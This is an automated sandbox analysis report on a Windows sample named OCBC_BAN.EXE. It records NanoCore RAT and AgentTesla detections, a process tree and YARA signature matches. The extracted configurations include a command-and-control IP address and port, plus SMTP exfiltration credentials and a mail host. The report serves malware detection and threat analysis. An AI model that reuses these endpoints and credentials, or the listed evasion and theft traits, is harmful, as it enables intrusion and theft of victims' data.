Edit tour

Windows Analysis Report
OCBC_BAN.EXE

Overview

General Information

Sample Name:	OCBC_BAN.EXE
Analysis ID:	623417
MD5:	be7bb1d25f6fb1b424ab8b54dc3971d0
SHA1:	73e4dcb20a351f5d7332ac2383fce657f22906b2
SHA256:	353fb33f1ee908da348b403a829f36ad6f6bd0aa3022bc56f0542f9197266b20
Tags:	AgentTeslaagentteslananocoreexe
Infos:

Detection

Nanocore, AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected AgentTesla

Sigma detected: NanoCore

Detected Nanocore Rat

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Yara detected Nanocore RAT

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

.NET source code contains very large array initializations

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Yara detected Credential Stealer

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Drops PE files

Detected TCP or UDP traffic on non-standard ports

Uses SMTP (mail sending)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

OCBC_BAN.EXE (PID: 4500 cmdline: "C:\Users\user\Desktop\OCBC_BAN.EXE" MD5: BE7BB1D25F6FB1B424AB8B54DC3971D0)

cmd.exe (PID: 3616 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 10 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 4804 cmdline: timeout 10 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

Pubrtkzyqpdcef1.exe (PID: 5604 cmdline: "C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe" MD5: 4AD411F172F9362BB859CD369E5F3F8E)

OCBC_BAN.EXE (PID: 3524 cmdline: C:\Users\user\Desktop\OCBC_BAN.EXE MD5: BE7BB1D25F6FB1B424AB8B54DC3971D0)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "49b4bf8f-6f20-4306-8d82-ae70effc", "Group": "Default", "Domain1": "23.105.131.196", "Domain2": "127.0.0.1", "Port": 9070, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "info@elparque.com.uy", "Password": "info919", "Host": "mail.elparque.com.uy"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x326a2:$s10: logins 0x32109:$s11: credential 0x2e6e6:$g1: get_Clipboard 0x2e6f4:$g2: get_Keyboard 0x2e701:$g3: get_Password 0x2f9e4:$g4: get_CtrlKeyDown 0x2f9f4:$g5: get_ShiftKeyDown 0x2fa05:$g6: get_AltKeyDown

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000009.00000000.465813754.0000000000E32000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000000.465813754.0000000000E32000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000000.00000003.497174960.000000000A803000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000003.497174960.000000000A803000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3803d:$x1: NanoCore.ClientPluginHost 0x6005d:$x1: NanoCore.ClientPluginHost 0x3807a:$x2: IClientNetworkHost 0x6009a:$x2: IClientNetworkHost 0x3bbad:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x63bcd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x37da5:$a: NanoCore 0x37db5:$a: NanoCore 0x37fe9:$a: NanoCore 0x37ffd:$a: NanoCore 0x3803d:$a: NanoCore 0x5fdc5:$a: NanoCore 0x5fdd5:$a: NanoCore 0x60009:$a: NanoCore 0x6001d:$a: NanoCore 0x6005d:$a: NanoCore 0x37e04:$b: ClientPlugin 0x38006:$b: ClientPlugin 0x38046:$b: ClientPlugin 0x5fe24:$b: ClientPlugin 0x60026:$b: ClientPlugin 0x60066:$b: ClientPlugin 0x37f2b:$c: ProjectData 0x5ff4b:$c: ProjectData 0x38932:$d: DESCrypto 0x60952:$d: DESCrypto 0x402fe:$e: KeepAlive
0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000000.00000003.497125933.000000000A7AC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000003.497125933.000000000A7AC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1049d:$x1: NanoCore.ClientPluginHost 0x104da:$x2: IClientNetworkHost 0x1400d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10205:$a: NanoCore 0x10215:$a: NanoCore 0x10449:$a: NanoCore 0x1045d:$a: NanoCore 0x1049d:$a: NanoCore 0x10264:$b: ClientPlugin 0x10466:$b: ClientPlugin 0x104a6:$b: ClientPlugin 0x1038b:$c: ProjectData 0x10d92:$d: DESCrypto 0x1875e:$e: KeepAlive 0x1674c:$g: LogClientMessage 0x12947:$i: get_Connected 0x110c8:$j: #=q 0x110f8:$j: #=q 0x11114:$j: #=q 0x11144:$j: #=q 0x11160:$j: #=q 0x1117c:$j: #=q 0x111ac:$j: #=q 0x111c8:$j: #=q
0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000000.466270917.0000000000E32000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000000.466270917.0000000000E32000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000009.00000002.632461806.0000000000E32000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.632461806.0000000000E32000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4b911:$x1: NanoCore.ClientPluginHost 0x4b94e:$x2: IClientNetworkHost 0x4f481:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b679:$a: NanoCore 0x4b689:$a: NanoCore 0x4b8bd:$a: NanoCore 0x4b8d1:$a: NanoCore 0x4b911:$a: NanoCore 0x4b6d8:$b: ClientPlugin 0x4b8da:$b: ClientPlugin 0x4b91a:$b: ClientPlugin 0x4b7ff:$c: ProjectData 0x4c206:$d: DESCrypto 0x4ddbb:$i: get_Connected 0x4c53c:$j: #=q 0x4c56c:$j: #=q 0x4c588:$j: #=q 0x4c5b8:$j: #=q 0x4c5d4:$j: #=q 0x4c5f0:$j: #=q 0x4c620:$j: #=q 0x4c63c:$j: #=q 0x4c680:$j: #=q 0x4c69c:$j: #=q
00000009.00000000.462652730.0000000000E32000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000000.462652730.0000000000E32000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000009.00000000.465157783.0000000000E32000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000000.465157783.0000000000E32000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0xf76c:$i2: IClientData 0xf78e:$i3: IClientNetwork 0xf79d:$i5: IClientDataHost 0xf7c7:$i6: IClientLoggingHost 0xf7da:$i7: IClientNetworkHost 0xf7ed:$i8: IClientUIHost 0xf7fb:$i9: IClientNameObjectCollection 0xf817:$i10: IClientReadOnlyNameObjectCollection 0xf56a:$s1: ClientPlugin 0xf781:$s1: ClientPlugin 0x147a2:$s6: get_ClientSettings
0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x6933f:$a: NanoCore 0x69398:$a: NanoCore 0x693d5:$a: NanoCore 0x6944e:$a: NanoCore 0x693a1:$b: ClientPlugin 0x693de:$b: ClientPlugin 0x69cdc:$b: ClientPlugin 0x69ce9:$b: ClientPlugin 0x86044:$b: ClientPlugin 0x5ef7e:$e: KeepAlive 0x69829:$g: LogClientMessage 0x697a9:$i: get_Connected 0x59775:$j: #=q 0x597a5:$j: #=q 0x597e1:$j: #=q 0x59809:$j: #=q 0x59839:$j: #=q 0x59869:$j: #=q 0x59899:$j: #=q 0x598c9:$j: #=q 0x598e5:$j: #=q
00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x42ecd:$a: NanoCore 0x42f26:$a: NanoCore 0x42f63:$a: NanoCore 0x42fdc:$a: NanoCore 0x56687:$a: NanoCore 0x5669c:$a: NanoCore 0x566d1:$a: NanoCore 0x6f133:$a: NanoCore 0x6f148:$a: NanoCore 0x6f17d:$a: NanoCore 0x42f2f:$b: ClientPlugin 0x42f6c:$b: ClientPlugin 0x4386a:$b: ClientPlugin 0x43877:$b: ClientPlugin 0x56443:$b: ClientPlugin 0x5645e:$b: ClientPlugin 0x5648e:$b: ClientPlugin 0x566a5:$b: ClientPlugin 0x566da:$b: ClientPlugin 0x6eeef:$b: ClientPlugin 0x6ef0a:$b: ClientPlugin
00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1107d:$x1: NanoCore.ClientPluginHost 0x110ba:$x2: IClientNetworkHost 0x14bed:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10de5:$a: NanoCore 0x10df5:$a: NanoCore 0x11029:$a: NanoCore 0x1103d:$a: NanoCore 0x1107d:$a: NanoCore 0x10e44:$b: ClientPlugin 0x11046:$b: ClientPlugin 0x11086:$b: ClientPlugin 0x10f6b:$c: ProjectData 0x11972:$d: DESCrypto 0x1933e:$e: KeepAlive 0x1732c:$g: LogClientMessage 0x13527:$i: get_Connected 0x11ca8:$j: #=q 0x11cd8:$j: #=q 0x11cf4:$j: #=q 0x11d24:$j: #=q 0x11d40:$j: #=q 0x11d5c:$j: #=q 0x11d8c:$j: #=q 0x11da8:$j: #=q
Process Memory Space: OCBC_BAN.EXE PID: 4500	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2f499:$x1: NanoCore.ClientPluginHost 0xa56af:$x1: NanoCore.ClientPluginHost 0x1242b6:$x1: NanoCore.ClientPluginHost 0x2f4d6:$x2: IClientNetworkHost 0xa56ec:$x2: IClientNetworkHost 0x1242f3:$x2: IClientNetworkHost 0x32fc7:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3e04d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x494b1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xa91dd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xacfb8:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x127de4:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x132e6a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: OCBC_BAN.EXE PID: 4500	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: OCBC_BAN.EXE PID: 4500	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: OCBC_BAN.EXE PID: 4500	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2f166:$a: NanoCore 0x2f176:$a: NanoCore 0x2f235:$a: NanoCore 0x2f244:$a: NanoCore 0x2f445:$a: NanoCore 0x2f459:$a: NanoCore 0x2f499:$a: NanoCore 0x3a6b7:$a: NanoCore 0x3a6c9:$a: NanoCore 0x3a705:$a: NanoCore 0x45b1b:$a: NanoCore 0x45b2d:$a: NanoCore 0x45b69:$a: NanoCore 0xa537c:$a: NanoCore 0xa538c:$a: NanoCore 0xa544b:$a: NanoCore 0xa545a:$a: NanoCore 0xa565b:$a: NanoCore 0xa566f:$a: NanoCore 0xa56af:$a: NanoCore 0xa9622:$a: NanoCore
Process Memory Space: Pubrtkzyqpdcef1.exe PID: 5604	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Pubrtkzyqpdcef1.exe PID: 5604	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: OCBC_BAN.EXE PID: 3524	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4acc:$x1: NanoCore.ClientPluginHost 0x43b36:$x1: NanoCore.ClientPluginHost 0x73622:$x1: NanoCore.ClientPluginHost 0x97cd6:$x1: NanoCore.ClientPluginHost 0x4b09:$x2: IClientNetworkHost 0x43b50:$x2: IClientNetworkHost 0x7364f:$x2: IClientNetworkHost 0x97cf0:$x2: IClientNetworkHost 0x85fa:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x13680:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: OCBC_BAN.EXE PID: 3524	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: OCBC_BAN.EXE PID: 3524	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4799:$a: NanoCore 0x47a9:$a: NanoCore 0x4868:$a: NanoCore 0x4877:$a: NanoCore 0x4a78:$a: NanoCore 0x4a8c:$a: NanoCore 0x4acc:$a: NanoCore 0xfcea:$a: NanoCore 0xfcfc:$a: NanoCore 0xfd38:$a: NanoCore 0x27dd6:$a: NanoCore 0x2a1b5:$a: NanoCore 0x2a1c9:$a: NanoCore 0x2a369:$a: NanoCore 0x2de78:$a: NanoCore 0x2ded3:$a: NanoCore 0x2df46:$a: NanoCore 0x43aa0:$a: NanoCore 0x43af9:$a: NanoCore 0x43b36:$a: NanoCore 0x43baf:$a: NanoCore
Click to see the 59 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
